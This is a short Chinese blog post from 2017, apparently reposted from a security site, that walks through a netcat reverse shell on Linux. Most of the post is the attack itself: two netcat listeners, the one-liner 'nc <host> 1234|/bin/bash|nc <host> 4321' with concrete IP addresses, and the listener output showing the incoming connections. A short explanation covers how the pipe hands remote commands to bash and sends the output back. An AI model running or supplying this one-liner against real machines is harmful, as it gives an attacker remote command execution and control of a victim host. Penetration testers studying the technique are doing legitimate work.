Linux渗透之反弹Shell 不指定

jackxiang 2017-6-24 12:41 | |
按顺序开三个SecureCRT终端,在一里面输入echo "hello jackX",会在二里面显示hello jackX:
一、
nc -l -p 1234 -vv
echo "hello jackX"

二、
nc -l -p 4321 -vv
hello jackX

三、
nc 10.44.202.177 1234|/bin/bash|nc 10.44.202.177 4321
nc 123.57.252.183 1234|/bin/bash|nc 123.57.252.183 4321这时我们就可以在1234端口输入命令,在4321端口查看命令的输出了。

管道“|”可以将上一个命令的输出作为下一个命令的输入。所以上面命令的意思就是将10.42.0.1:1234传过来的命令交给/bin/bash执行,再将执行结果传给10.44.202.177:4321显示。nc -l -p 4321 -vv
nc -l -p 4321 -vv
Ncat: Version 6.40 ( http://nmap.org/ncat )
Ncat: Listening on :::4321
Ncat: Listening on 0.0.0.0:4321
Ncat: Connection from 10.44.202.177.
Ncat: Connection from 10.44.202.177:59294.


nc -l -p 1234 -vv
Ncat: Version 6.40 ( http://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.44.202.177.
Ncat: Connection from 10.44.202.177:51650.


nc 10.44.202.177 1234|/bin/bash|nc 10.44.202.177 4321
触发上面两个。

摘自实践自:【【安全客】Linux渗透之反弹Shell】http://m.toutiao.com/group/6398009141268365570/?iid=7737129548&app=news_article&tt_from=copy_link&utm_source=copy_link&utm_medium=toutiao_ios&utm_campaign=client_share

作者:jackxiang@向东博客 专注WEB应用 构架之美 --- 构架之美,在于尽态极妍 | 应用之美,在于药到病除
地址:http://jackxiang.com/post/9254/
版权所有。转载时必须以链接形式注明作者和原始出处及本声明!

评论列表
发表评论

昵称

网址

电邮

打开HTML 打开UBB 打开表情 隐藏 记住我 [登入] [注册]